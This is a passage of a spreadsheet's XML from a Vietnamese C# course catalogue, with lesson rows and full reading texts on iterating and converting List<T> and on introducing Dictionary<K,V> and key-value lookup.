- `Reverse()` chỉ lật thứ tự hiện có, không sắp xếp. Muốn giữ danh sách cũ, hãy chép ra trước.</t>
        </is>
      </c>
    </row>
    <row r="7" ht="409.6" customHeight="1" s="18">
      <c r="A7" s="10" t="n">
        <v>6</v>
      </c>
      <c r="B7" s="10" t="inlineStr">
        <is>
          <t>1. Cấu trúc dữ liệu nâng cao: Collections</t>
        </is>
      </c>
      <c r="C7" s="10" t="inlineStr">
        <is>
          <t>Thao tác nâng cao với List&lt;T&gt;</t>
        </is>
      </c>
      <c r="D7" s="10" t="inlineStr">
        <is>
          <t>Duyệt và Chuyển đổi List&lt;T&gt;</t>
        </is>
      </c>
      <c r="E7" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F7" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G7" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H7" s="10" t="inlineStr">
        <is>
          <t>Phân biệt for và foreach, hiểu vì sao không được thêm/xóa phần tử trong foreach, và chuyển đổi List sang dạng khác.</t>
        </is>
      </c>
      <c r="I7" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J7" s="10" t="inlineStr">
        <is>
          <t>Dãy ô với con trỏ duyệt. Tab lỗi có thẻ 'phiên bản danh sách' (version 1 → 2) để giải thích vì sao vòng lặp phát hiện danh sách bị sửa. Tab chuyển đổi hiện danh sách mới xuất hiện bên dưới, danh sách gốc giữ nguyên.</t>
        </is>
      </c>
      <c r="K7" s="10" t="inlineStr">
        <is>
          <t>H01, H03</t>
        </is>
      </c>
      <c r="L7" s="10" t="inlineStr">
        <is>
          <t>for và foreach | Xóa trong foreach | Chuyển đổi</t>
        </is>
      </c>
      <c r="M7" s="10" t="inlineStr">
        <is>
          <t>for: i chạy 0..Count − 1, prices[i] = prices[i] * 2 sửa trực tiếp từng phần tử.
foreach: biến p lần lượt nhận từng giá trị để đọc (tính tổng). Ghi chú: gán p = ... là lỗi biên dịch CS1656.
Xóa trong foreach: nums = {1, 2, 3, 4}; khi gặp 2 gọi nums.Remove(2) → phiên bản danh sách đổi → lần lặp kế tiếp ném InvalidOperationException "Collection was modified; enumeration operation may not execute."
Cách đúng: nums.RemoveAll(n =&gt; n % 2 == 0) → {1, 3}.
Chuyển đổi: prices.ConvertAll(p =&gt; p * 1.1) tạo List&lt;double&gt; mới; ToArray() tạo mảng; danh sách gốc không đổi.</t>
        </is>
      </c>
      <c r="N7" s="10" t="inlineStr">
        <is>
          <t>prices = {100, 200, 300}; nums = {1, 2, 3, 4}</t>
        </is>
      </c>
      <c r="O7" s="10" t="inlineStr">
        <is>
          <t>Dùng for khi cần chỉ số hoặc sửa phần tử, foreach để đọc. Không thêm/xóa phần tử trong foreach; dùng RemoveAll hoặc for duyệt ngược.</t>
        </is>
      </c>
      <c r="P7" s="10" t="inlineStr">
        <is>
          <t>InvalidOperationException ném ở lần MoveNext sau khi danh sách bị thay đổi. CS1656: không gán được cho biến lặp foreach.</t>
        </is>
      </c>
      <c r="Q7" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-list-t/duyet-va-chuyen-doi-list-t/index.html</t>
        </is>
      </c>
      <c r="R7" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-list-t/duyet-va-chuyen-doi-list-t/</t>
        </is>
      </c>
      <c r="S7" s="10" t="n"/>
      <c r="T7" s="12" t="n"/>
      <c r="U7" s="12" t="n"/>
      <c r="V7" s="21" t="inlineStr">
        <is>
          <t>Duyệt và Chuyển đổi List&lt;T&gt;
Trong quá trình phát triển ứng dụng C#, List&lt;T&gt; là một trong những cấu trúc dữ liệu linh hoạt và được sử dụng rộng rãi nhất. Tuy nhiên, việc lưu trữ dữ liệu chỉ là bước khởi đầu. Để thực sự làm việc hiệu quả với List&lt;T&gt;, chúng ta cần nắm vững các kỹ thuật duyệt qua các phần tử của nó và biết cách chuyển đổi nó sang các cấu trúc dữ liệu khác khi cần thiết. Bài đọc này sẽ hướng dẫn bạn các phương pháp phổ biến để thực hiện những thao tác này.
Duyệt List&lt;T&gt; với Vòng lặp foreach
Vòng lặp foreach là cách đơn giản và phổ biến nhất để duyệt qua tất cả các phần tử trong một List&lt;T&gt; hoặc bất kỳ tập hợp nào triển khai giao diện IEnumerable&lt;T&gt;. Nó được thiết kế để đọc từng phần tử một cách tuần tự mà không cần quan tâm đến chỉ mục của chúng.
Khi nào nên dùng foreach:
Khi bạn chỉ cần đọc hoặc truy cập giá trị của từng phần tử.
Khi bạn không cần chỉnh sửa các phần tử bên trong danh sách (trừ khi phần tử đó là kiểu tham chiếu và bạn chỉnh sửa các thuộc tính bên trong nó, nhưng không thể gán lại toàn bộ phần tử).
Khi bạn muốn một cú pháp ngắn gọn và dễ đọc.
Ví dụ:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        List&lt;string&gt; monHoc = new List&lt;string&gt; { "Toán", "Lý", "Hóa", "Sinh" };
        Console.WriteLine("Danh sách các môn học:");
        foreach (string mon in monHoc)
        {
            Console.WriteLine($"- {mon}");
        }
        // Ví dụ truy cập thuộc tính của đối tượng trong List
        List&lt;SinhVien&gt; danhSachSinhVien = new List&lt;SinhVien&gt;
        {
            new SinhVien { MaSV = "SV001", Ten = "Nguyễn Văn A" },
            new SinhVien { MaSV = "SV002", Ten = "Trần Thị B" }
        };
        Console.WriteLine("\nThông tin sinh viên:");
        foreach (SinhVien sv in danhSachSinhVien)
        {
            Console.WriteLine($"Mã SV: {sv.MaSV}, Tên: {sv.Ten}");
            // Có thể sửa đổi thuộc tính của đối tượng, ví dụ:
            // sv.Ten = sv.Ten.ToUpper(); // Chỉ sửa đổi thuộc tính, không gán lại sv
        }
    }
}
public class SinhVien
{
    public string MaSV { get; set; }
    public string Ten { get; set; }
}
Duyệt và Chỉnh sửa List&lt;T&gt; với Vòng lặp for (dùng chỉ mục)
Vòng lặp for truyền thống cung cấp quyền kiểm soát chi tiết hơn bằng cách sử dụng chỉ mục (index) của các phần tử. Điều này đặc biệt hữu ích khi bạn cần truy cập hoặc chỉnh sửa một phần tử dựa trên vị trí của nó trong danh sách.
Khi nào nên dùng for:
Khi bạn cần chỉnh sửa giá trị của các phần tử trong danh sách tại một vị trí cụ thể.
Khi bạn cần duyệt qua danh sách theo một thứ tự không tuần tự (ví dụ: duyệt ngược, duyệt cách quãng).
Khi bạn cần biết vị trí (chỉ mục) của phần tử đang được xử lý.
Khi bạn cần xóa phần tử trong quá trình duyệt (lưu ý phải duyệt ngược để tránh lỗi chỉ mục).
Ví dụ chỉnh sửa phần tử:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        List&lt;int&gt; diemSo = new List&lt;int&gt; { 7, 8, 5, 9, 6 };
        Console.WriteLine("Điểm số ban đầu:");
        foreach (int diem in diemSo)
        {
            Console.Write($"{diem} ");
        }
        Console.WriteLine();
        // Cộng thêm 1 điểm cho tất cả các điểm số
        for (int i = 0; i &lt; diemSo.Count; i++)
        {
            diemSo[i] += 1; // Chỉnh sửa phần tử tại chỉ mục i
        }
        Console.WriteLine("Điểm số sau khi cập nhật:");
        for (int i = 0; i &lt; diemSo.Count; i++)
        {
            Console.Write($"{diemSo[i]} ");
        }
        Console.WriteLine();
        // Ví dụ xóa phần tử khi duyệt ngược
        List&lt;string&gt; sanPham = new List&lt;string&gt; { "Áo", "Quần", "Giày", "Mũ", "Tất" };
        Console.WriteLine("\nDanh sách sản phẩm ban đầu:");
        foreach (string sp in sanPham) Console.Write($"{sp} ");
        Console.WriteLine();
        // Xóa các sản phẩm có độ dài tên nhỏ hơn 3 ký tự (ví dụ: "Áo", "Mũ")
        for (int i = sanPham.Count - 1; i &gt;= 0; i--) // Duyệt ngược
        {
            if (sanPham[i].Length &lt; 3)
            {
                sanPham.RemoveAt(i);
            }
        }
        Console.WriteLine("Danh sách sản phẩm sau khi xóa:");
        foreach (string sp in sanPham) Console.Write($"{sp} ");
        Console.WriteLine();
    }
}
Lưu ý quan trọng: Khi bạn cần xóa phần tử khỏi List&lt;T&gt; trong quá trình duyệt, luôn luôn duyệt từ cuối danh sách về đầu danh sách (sử dụng vòng lặp for với chỉ mục giảm dần). Nếu bạn duyệt từ đầu về cuối và xóa phần tử, các chỉ mục của các phần tử còn lại sẽ thay đổi, dẫn đến việc bỏ sót phần tử hoặc gây ra lỗi IndexOutOfRangeException.
Chuyển đổi List&lt;T&gt; sang Mảng (Array) với ToArray()
Đôi khi, bạn cần một cấu trúc dữ liệu có kích thước cố định hoặc cần tương tác với các API cũ hơn chỉ chấp nhận mảng. List&lt;T&gt; cung cấp phương thức ToArray() để chuyển đổi nội dung của nó thành một mảng T[] mới.
Khi nào nên dùng ToArray():
Khi bạn cần một bản sao dữ liệu có kích thước cố định.
Khi bạn muốn truyền dữ liệu tới một phương thức yêu cầu tham số là mảng.
Khi bạn muốn "đóng băng" trạng thái hiện tại của danh sách để tránh các thay đổi không mong muốn sau này.
Ví dụ:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        List&lt;double&gt; nhietDo = new List&lt;double&gt; { 25.5, 26.1, 24.9, 27.0 };
        // Chuyển đổi List&lt;double&gt; sang mảng double[]
        double[] mangNhietDo = nhietDo.ToArray();
        Console.WriteLine("Các giá trị nhiệt độ trong mảng:");
        foreach (double temp in mangNhietDo)
        {
            Console.WriteLine(temp);
        }
        // Sau khi chuyển đổi, thay đổi List sẽ không ảnh hưởng đến mảng
        nhietDo.Add(28.5); 
        Console.WriteLine($"\nSố lượng phần tử trong List: {nhietDo.Count}"); // 5
        Console.WriteLine($"Số lượng phần tử trong mảng: {mangNhietDo.Length}"); // 4
    }
}
Chuyển đổi sang List&lt;T&gt; với ToList()
Ngược lại với ToArray(), phương thức mở rộng ToList() (thuộc không gian tên System.Linq) cho phép bạn chuyển đổi bất kỳ tập hợp nào triển khai IEnumerable&lt;T&gt; thành một List&lt;T&gt; mới. Điều này rất hữu ích khi bạn nhận được dữ liệu từ một nguồn khác (ví dụ: một mảng, kết quả truy vấn LINQ, hoặc một loại collection khác) và muốn sử dụng sự linh hoạt của List&lt;T&gt;.
Khi nào nên dùng ToList():
Khi bạn cần chuyển đổi một tập hợp có kích thước cố định (như mảng) sang một tập hợp có kích thước động để dễ dàng thêm/bớt phần tử.
Khi bạn muốn tạo một bản sao độc lập của một tập hợp hiện có.
Khi bạn muốn sử dụng các phương thức tiện ích của List&lt;T&gt; sau khi thực hiện một truy vấn LINQ.
Ví dụ:
using System;
using System.Collections.Generic;
using System.Linq; // Cần include namespace này để sử dụng ToList()
public class Program
{
    public static void Main(string[] args)
    {
        // Chuyển đổi từ một mảng sang List&lt;string&gt;
        string[] tenThanhPho = { "Hà Nội", "Đà Nẵng", "TP.HCM" };
        List&lt;string&gt; danhSachThanhPho = tenThanhPho.ToList();
        Console.WriteLine("Danh sách thành phố:");
        danhSachThanhPho.Add("Cần Thơ"); // Có thể thêm phần tử sau khi chuyển đổi
        foreach (string tp in danhSachThanhPho)
        {
            Console.WriteLine($"- {tp}");
        }
        // Chuyển đổi từ một tập hợp khác (ví dụ: kết quả truy vấn LINQ) sang List&lt;int&gt;
        IEnumerable&lt;int&gt; soNguyenChan = Enumerable.Range(1, 10).Where(n =&gt; n % 2 == 0);
        List&lt;int&gt; danhSachSoChan = soNguyenChan.ToList();
        Console.WriteLine("\nDanh sách số chẵn từ 1 đến 10:");
        foreach (int so in danhSachSoChan)
        {
            Console.Write($"{so} ");
        }
        Console.WriteLine();
    }
}
Tổng kết và Lựa chọn Phương pháp
Việc lựa chọn phương pháp duyệt và chuyển đổi List&lt;T&gt; phụ thuộc vào nhu cầu cụ thể của bạn:
Sử dụng foreach khi bạn chỉ cần đọc dữ liệu, không quan tâm đến chỉ mục và muốn một cú pháp đơn giản, an toàn.
Sử dụng for khi bạn cần truy cập hoặc chỉnh sửa phần tử dựa trên chỉ mục của nó, hoặc khi bạn cần xóa phần tử trong quá trình duyệt (hãy nhớ duyệt ngược!).
Sử dụng ToArray() khi bạn cần một mảng có kích thước cố định, cần truyền dữ liệu tới API yêu cầu mảng, hoặc muốn tạo một bản sao "đóng băng" của danh sách.
Sử dụng ToList() khi bạn cần chuyển đổi một tập hợp bất kỳ (mảng, kết quả LINQ, v.v.) sang một List&lt;T&gt; để tận dụng sự linh hoạt và các phương thức tiện ích của nó.
Nắm vững các kỹ thuật này sẽ giúp bạn quản lý và thao tác dữ liệu trong List&lt;T&gt; một cách hiệu quả và linh hoạt hơn trong các ứng dụng C#.</t>
        </is>
      </c>
      <c r="W7" s="22" t="inlineStr">
        <is>
          <t># Duyệt và Chuyển đổi List&lt;T&gt;
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Duyệt `List&lt;T&gt;` bằng `for` và `foreach`, và biết khi nào dùng cái nào.
- Giải thích vì sao không gán được biến lặp của `foreach`.
- Nhận ra vì sao thêm hoặc xóa phần tử trong `foreach` gây `InvalidOperationException`, và dùng `RemoveAll` hoặc `for` duyệt ngược thay thế.
- Chuyển List sang dạng khác bằng `ConvertAll`, `ToArray`, `ToList` mà không đụng tới danh sách gốc.
- Quan sát con trỏ duyệt đi qua danh sách bằng hoạt động mô phỏng.
## Duyệt bằng foreach
`foreach` là cách đơn giản và phổ biến nhất để đi qua mọi phần tử. Nó lấy lần lượt từng phần tử vào một biến lặp, không cần chỉ số. Dùng khi:
- Bạn chỉ cần **đọc** từng phần tử.
- Bạn muốn cú pháp ngắn gọn, dễ đọc.
Biến lặp là **chỉ đọc**: bạn không thể gán lại nó (lỗi biên dịch CS1656). Tuy nhiên, nếu phần tử là đối tượng (kiểu tham chiếu), bạn vẫn sửa được **thuộc tính bên trong** đối tượng đó, chỉ không gán lại cả biến lặp.
```csharp
using System;
using System.Collections.Generic;
public class Student
{
    public string Id { get; set; }
    public string Name { get; set; }
}
public class Program
{
    public static void Main()
    {
        var list = new List&lt;Student&gt;
        {
            new Student { Id = "SV01", Name = "An" },
            new Student { Id = "SV02", Name = "Bình" }
        };
        foreach (Student s in list)
        {
            s.Name = s.Name.ToUpper();   // được: sửa thuộc tính
            // s = null;                 // lỗi biên dịch CS1656: không gán lại biến lặp
            Console.WriteLine($"{s.Id}: {s.Name}");
        }
        // SV01: AN
        // SV02: BÌNH
    }
}
```
## Duyệt bằng for
`for` dùng chỉ số `i` chạy từ 0 đến `Count - 1`. Vì có chỉ số, bạn vừa đọc được vừa **sửa được** phần tử. Dùng khi:
- Cần sửa giá trị phần tử tại một vị trí.
- Cần biết vị trí của phần tử đang xử lý.
- Cần duyệt ngược hoặc cách quãng.
```csharp
var prices = new List&lt;int&gt; { 100, 200, 300 };
for (int i = 0; i &lt; prices.Count; i++)
{
    prices[i] = prices[i] * 2;
}
// prices: 200, 400, 600
int sum = 0;
foreach (int p in prices)
{
    sum += p;
}
Console.WriteLine(sum);   // 1200
```
| | `for` | `foreach` |
|---|---|---|
| Có chỉ số `i` | Có | Không |
| Sửa phần tử số, chuỗi | Được (`list[i] = ...`) | Không (biến lặp chỉ đọc) |
| Phù hợp khi | Cần chỉ số hoặc sửa phần tử | Chỉ đọc từng phần tử |
## Xóa phần tử khi đang duyệt
### Không xóa trong foreach
Mỗi `List&lt;T&gt;` ghi nhớ một "phiên bản" (version), tăng lên mỗi khi danh sách bị thêm hoặc xóa. Vòng `foreach` nhớ phiên bản lúc bắt đầu. Nếu giữa chừng danh sách bị sửa cấu trúc, ở lần lặp kế tiếp `foreach` thấy phiên bản khác nhau và ném lỗi:
```csharp
var nums = new List&lt;int&gt; { 1, 2, 3, 4 };
foreach (int n in nums)
{
    if (n == 2)
    {
        nums.Remove(2);   // sửa danh sách khi đang duyệt
    }
}
// Lỗi: System.InvalidOperationException
// Collection was modified; enumeration operation may not execute.
```
### Cách đúng 1: RemoveAll
Muốn xóa theo điều kiện, hãy để List tự lo:
```csharp
var nums = new List&lt;int&gt; { 1, 2, 3, 4 };
nums.RemoveAll(n =&gt; n % 2 == 0);   // xóa mọi số chẵn
// nums: 1, 3
```
### Cách đúng 2: for duyệt ngược
Nếu cần xóa bằng `for`, hãy duyệt từ **cuối về đầu**. Xóa một ô làm các ô phía sau dịch trái, nhưng với duyệt ngược, các ô còn phải xét đều nằm phía trước nên chỉ số của chúng không bị lệch. Nếu duyệt xuôi rồi xóa, chỉ số bị lệch, dễ bỏ sót phần tử hoặc truy cập sai vị trí.
```csharp
var products = new List&lt;string&gt; { "Áo", "Quần", "Giày", "Mũ", "Tất" };
for (int i = products.Count - 1; i &gt;= 0; i--)
{
    if (products[i].Length &lt; 3)
    {
        products.RemoveAt(i);   // xóa "Mũ", "Áo"
    }
}
Console.WriteLine(string.Join(", ", products));   // Quần, Giày, Tất
```
## Chuyển đổi List
Bạn có thể tạo bản mới ở dạng khác, danh sách gốc giữ nguyên:
- **`ConvertAll`**: biến mỗi phần tử thành một giá trị khác, trả về `List` mới (có thể khác kiểu).
- **`ToArray`**: chép các phần tử sang một mảng mới. Hữu ích khi một API chỉ nhận mảng, hoặc khi bạn muốn "chụp lại" trạng thái hiện tại của danh sách.
- **`ToList`** (cần `using System.Linq;`): làm điều ngược lại, biến mảng hoặc kết quả LINQ thành `List&lt;T&gt;` mới để có thể thêm bớt phần tử.
```csharp
using System.Linq;
var prices = new List&lt;int&gt; { 100, 200, 300 };
List&lt;double&gt; big = prices.ConvertAll(p =&gt; p * 1.5);   // 150, 300, 450
int[] arr = prices.ToArray();                         // 100, 200, 300
prices.Add(400);
Console.WriteLine(arr.Length);                        // 3 (mảng là bản chép riêng)
string[] cities = { "Hà Nội", "Đà Nẵng" };
List&lt;string&gt; cityList = cities.ToList();
cityList.Add("Cần Thơ");                              // thêm được, vì giờ là List
```
## Hoạt động: Con trỏ duyệt đi qua danh sách
Mô phỏng dưới đây có ba tab. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **for và foreach**. Danh sách `prices` là 100, 200, 300. Vòng `for` có con trỏ `i` đi qua từng ô, nhân đôi ngay tại ô đó: 200, 400, 600. Tiếp theo vòng `foreach` có con trỏ `p` đi qua từng ô, và ô `sum` tăng dần 200, 600, 1200. Dòng cuối nhắc rằng `p = 5` bị lỗi biên dịch CS1656.
- Mở tab **Xóa trong foreach**. Danh sách `nums` là 1, 2, 3, 4 và ô "phiên bản danh sách" là 1. Khi `n = 2`, lệnh `nums.Remove(2)` làm danh sách còn 1, 3, 4 và phiên bản thành 2 (ô báo đỏ). Ở lần lặp kế tiếp, thẻ lỗi đỏ **InvalidOperationException** xuất hiện vì phiên bản 1 khác 2. Bước cuối cho thấy cách đúng: `RemoveAll(n =&gt; n % 2 == 0)` trên danh sách mới {1, 2, 3, 4}, hai số chẵn bị đánh dấu xóa, còn lại 1 và 3.
- Mở tab **Chuyển đổi**. `prices` là List&lt;int&gt; gồm 100, 200, 300. `ConvertAll(p =&gt; p * 1.5)` tạo List&lt;double&gt; mới 150.0, 300.0, 450.0 (ô mới màu xanh) và danh sách gốc mờ đi vì nằm yên. `ToArray()` tạo mảng `int[]` mới. Cuối cùng có ba nơi riêng biệt: `prices`, `big` và `arr`.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-list-t/duyet-va-chuyen-doi-list-t/" title="Duyệt và chuyển đổi List&lt;T&gt;" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: dùng `for` khi cần chỉ số hoặc sửa phần tử, dùng `foreach` để đọc. Không thêm hoặc xóa phần tử trong lúc `foreach` đang chạy, hãy dùng `RemoveAll` hoặc `for` duyệt ngược. `ConvertAll` và `ToArray` tạo bản mới, không đụng tới danh sách gốc.
## Tóm tắt
- `for` có chỉ số và sửa được phần tử. `foreach` gọn hơn nhưng chỉ để đọc.
- Biến lặp của `foreach` không gán được (lỗi biên dịch CS1656), nhưng vẫn sửa được thuộc tính của đối tượng bên trong.
- Thêm hoặc xóa phần tử trong `foreach` gây `InvalidOperationException`.
- Xóa theo điều kiện bằng `RemoveAll`, hoặc dùng `for` duyệt ngược từ cuối về đầu.
- `ConvertAll`, `ToArray` và `ToList` tạo List hoặc mảng mới, danh sách gốc giữ nguyên.</t>
        </is>
      </c>
    </row>
    <row r="8" ht="409.6" customHeight="1" s="18">
      <c r="A8" s="10" t="n">
        <v>7</v>
      </c>
      <c r="B8" s="10" t="inlineStr">
        <is>
          <t>1. Cấu trúc dữ liệu nâng cao: Collections</t>
        </is>
      </c>
      <c r="C8" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu về Dictionary&lt;K,V&gt;</t>
        </is>
      </c>
      <c r="D8" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu Dictionary&lt;K,V&gt; và tầm quan trọng của Key-Value Pair</t>
        </is>
      </c>
      <c r="E8" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F8" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G8" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H8" s="10" t="inlineStr">
        <is>
          <t>Hình dung Dictionary như tủ có ngăn dán nhãn: tra theo khóa đi thẳng tới giá trị, không phải quét từng phần tử.</t>
        </is>
      </c>
      <c r="I8" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: List&lt;Student&gt; | Dictionary&lt;string, string&gt;</t>
        </is>
      </c>
      <c r="J8" s="10" t="inlineStr">
        <is>
          <t>Trái: dãy thẻ sinh viên, kính lúp quét từng thẻ. Phải: tủ 6 ngăn, nhãn là mã SV; mũi tên đi thẳng tới ngăn cần tìm. Dưới mỗi cột là bảng đếm số lần so sánh.</t>
        </is>
      </c>
      <c r="K8" s="10" t="inlineStr">
        <is>
          <t>H01, H02, H22</t>
        </is>
      </c>
      <c r="L8" s="10" t="inlineStr">
        <is>
          <t>Tìm SV05 | Tìm SV09 (không có)</t>
        </is>
      </c>
      <c r="M8" s="10" t="inlineStr">
        <is>
          <t>Cả hai chứa 6 sinh viên SV01..SV06.
Trái: Find(s =&gt; s.Id == "SV05") xét SV01, SV02... mỗi bước tăng bộ đếm.
Phải: dict["SV05"] → tính vị trí từ khóa và đi thẳng tới ngăn SV05 (1 lần tra).
Kết quả: trái 5 lần so sánh, phải 1 lần tra.
Tab SV09: trái quét hết 6 thẻ rồi trả null; phải TryGetValue trả false ngay.</t>
        </is>
      </c>
      <c r="N8" s="10" t="inlineStr">
        <is>
          <t>SV01 An, SV02 Bình, SV03 Chi, SV04 Dũng, SV05 Hà, SV06 Khoa</t>
        </is>
      </c>
      <c r="O8" s="10" t="inlineStr">
        <is>
          <t>Mỗi khóa là duy nhất và dẫn thẳng tới một giá trị. Tra theo khóa là thế mạnh của Dictionary.</t>
        </is>
      </c>
      <c r="P8" s="10" t="inlineStr">
        <is>
          <t>Tra theo khóa trung bình O(1) nhờ bảng băm; mô phỏng chỉ minh họa ý 'đi thẳng tới ngăn', không vẽ chi tiết bảng băm.</t>
        </is>
      </c>
      <c r="Q8" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-dictionary-k-v/gioi-thieu-dictionary-k-v-va-tam-quan-trong-cua-key-value-pair/index.html</t>
        </is>
      </c>
      <c r="R8" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-dictionary-k-v/gioi-thieu-dictionary-k-v-va-tam-quan-trong-cua-key-value-pair/</t>
        </is>
      </c>
      <c r="S8" s="10" t="n"/>
      <c r="T8" s="12" t="n"/>
      <c r="U8" s="12" t="n"/>
      <c r="V8" s="21" t="inlineStr">
        <is>
          <t>Giới thiệu Dictionary&lt;K,V&gt;
Trong thế giới lập trình, việc tổ chức và quản lý dữ liệu hiệu quả là chìa khóa để xây dựng các ứng dụng mạnh mẽ và có hiệu suất cao. Bạn đã làm quen với List&lt;T&gt; - một cấu trúc dữ liệu tuyệt vời cho việc lưu trữ các tập hợp có thứ tự. Tuy nhiên, khi nhu cầu của bạn là tìm kiếm hoặc truy cập dữ liệu dựa trên một định danh (identifier) cụ thể thay vì vị trí theo chỉ mục, List&lt;T&gt; có thể không phải là lựa chọn tối ưu nhất.
Đây chính là lúc Dictionary&lt;K,V&gt; phát huy sức mạnh của mình. Dictionary&lt;K,V&gt; là một cấu trúc dữ liệu thuộc họ các collection trong C#, được thiết kế để lưu trữ dữ liệu dưới dạng các cặp khóa-giá trị (Key-Value Pair). Chữ K đại diện cho kiểu dữ liệu của khóa (Key), và V đại diện cho kiểu dữ liệu của giá trị (Value).
Hãy tưởng tượng một cuốn từ điển: bạn không tìm một từ dựa trên việc nó nằm ở trang thứ bao nhiêu, mà bạn tìm nó dựa trên chính bản thân từ đó (khóa), và kết quả trả về là định nghĩa của từ đó (giá trị). Dictionary&lt;K,V&gt; hoạt động theo nguyên tắc tương tự, cho phép bạn truy cập giá trị cực kỳ nhanh chóng thông qua khóa tương ứng của nó.
Khái niệm Key-Value Pair: Nền tảng của Dictionary
Điểm cốt lõi làm nên Dictionary&lt;K,V&gt; chính là khái niệm Key-Value Pair. Mỗi phần tử trong Dictionary là một cặp dữ liệu, bao gồm:
Key (Khóa): Là một giá trị duy nhất dùng để định danh và truy cập đến một phần tử. Trong một Dictionary, mỗi khóa phải là duy nhất (unique). Bạn không thể có hai phần tử với cùng một khóa. Khóa có thể là bất kỳ kiểu dữ liệu nào (chuỗi, số nguyên, đối tượng tùy chỉnh...), miễn là nó có thể được sử dụng để băm (hashing).
Value (Giá trị): Là dữ liệu thực tế mà bạn muốn lưu trữ. Giá trị được liên kết với một khóa cụ thể. Không giống như khóa, các giá trị có thể trùng lặp.
Ví dụ, nếu bạn muốn lưu trữ thông tin về mã sản phẩm và tên sản phẩm tương ứng, mã sản phẩm (ví dụ: "SP001") sẽ là khóa, và tên sản phẩm ("Bàn phím cơ") sẽ là giá trị.
// Một Key-Value Pair ví dụ
// Key: "SP001" (kiểu string)
// Value: "Bàn phím cơ" (kiểu string)
Sự kết hợp giữa khóa và giá trị tạo ra một mối quan hệ một-một: mỗi khóa duy nhất sẽ trỏ tới một giá trị duy nhất.
Nguyên tắc hoạt động và tốc độ truy cập
Dictionary&lt;K,V&gt; được triển khai dựa trên cấu trúc dữ liệu Hash Table (Bảng băm). Khi bạn thêm một cặp khóa-giá trị vào Dictionary:
Hệ thống sẽ tính toán một giá trị băm (hash code) từ khóa.
Giá trị băm này được sử dụng để xác định vị trí lưu trữ của cặp khóa-giá trị trong bộ nhớ.
Nhờ cơ chế băm này, việc tìm kiếm, thêm hoặc xóa một phần tử trong Dictionary có thể được thực hiện với độ phức tạp thời gian trung bình là O(1) (hằng số). Điều này có nghĩa là, dù Dictionary của bạn có 10 phần tử hay 1 triệu phần tử, thời gian để tìm một phần tử theo khóa vẫn gần như không đổi.
Đây là một ưu điểm vượt trội so với List&lt;T&gt; khi bạn cần truy cập dữ liệu nhanh chóng. Trong List&lt;T&gt;, để tìm một phần tử theo giá trị, bạn thường phải duyệt qua từng phần tử một (phép tìm kiếm tuần tự), dẫn đến độ phức tạp thời gian trung bình là O(N), với N là số lượng phần tử.
Dictionary&lt;K,V&gt; và List&lt;T&gt;: Khi nào sử dụng loại nào?
Để hiểu rõ hơn khi nào nên sử dụng Dictionary&lt;K,V&gt;, hãy cùng so sánh nó với List&lt;T&gt;:
List&lt;T&gt;
Cấu trúc: Một danh sách các phần tử có thứ tự, được truy cập thông qua chỉ mục số nguyên (0, 1, 2...).
Truy cập: Nhanh chóng khi truy cập theo chỉ mục (list[index]) với độ phức tạp O(1).
Tìm kiếm: Chậm khi tìm kiếm một phần tử theo giá trị của nó (cần duyệt qua danh sách), độ phức tạp O(N).
Khi sử dụng:
Khi thứ tự của các phần tử là quan trọng.
Khi bạn cần truy cập các phần tử dựa trên vị trí của chúng.
Khi bạn thường xuyên thêm/xóa phần tử ở cuối danh sách.
Khi bạn cần lưu trữ một tập hợp các giá trị không có định danh duy nhất rõ ràng.
Dictionary&lt;K,V&gt;
Cấu trúc: Một tập hợp các cặp khóa-giá trị, không có thứ tự cố định.
Truy cập: Cực kỳ nhanh chóng khi truy cập theo khóa (dictionary[key]) với độ phức tạp trung bình O(1).
Tìm kiếm: Nhanh chóng khi kiểm tra sự tồn tại của một khóa hoặc truy xuất giá trị tương ứng.
Khi sử dụng:
Khi bạn cần lưu trữ dữ liệu mà mỗi phần tử có một định danh duy nhất (khóa).
Khi bạn cần truy cập dữ liệu cực kỳ nhanh chóng dựa trên định danh đó.
Khi bạn muốn ánh xạ (map) một giá trị này sang một giá trị khác (ví dụ: mã quốc gia sang tên quốc gia).
Khi thứ tự của các phần tử không quan trọng.
Tóm lại, nếu bạn có một định danh duy nhất cho mỗi mảnh dữ liệu và cần truy xuất nó một cách hiệu quả, Dictionary&lt;K,V&gt; là lựa chọn lý tưởng. Nếu bạn chỉ cần một danh sách các mục có thứ tự và thường xuyên truy cập theo vị trí, List&lt;T&gt; sẽ phù hợp hơn.
Các trường hợp sử dụng lý tưởng cho Dictionary&lt;K,V&gt;
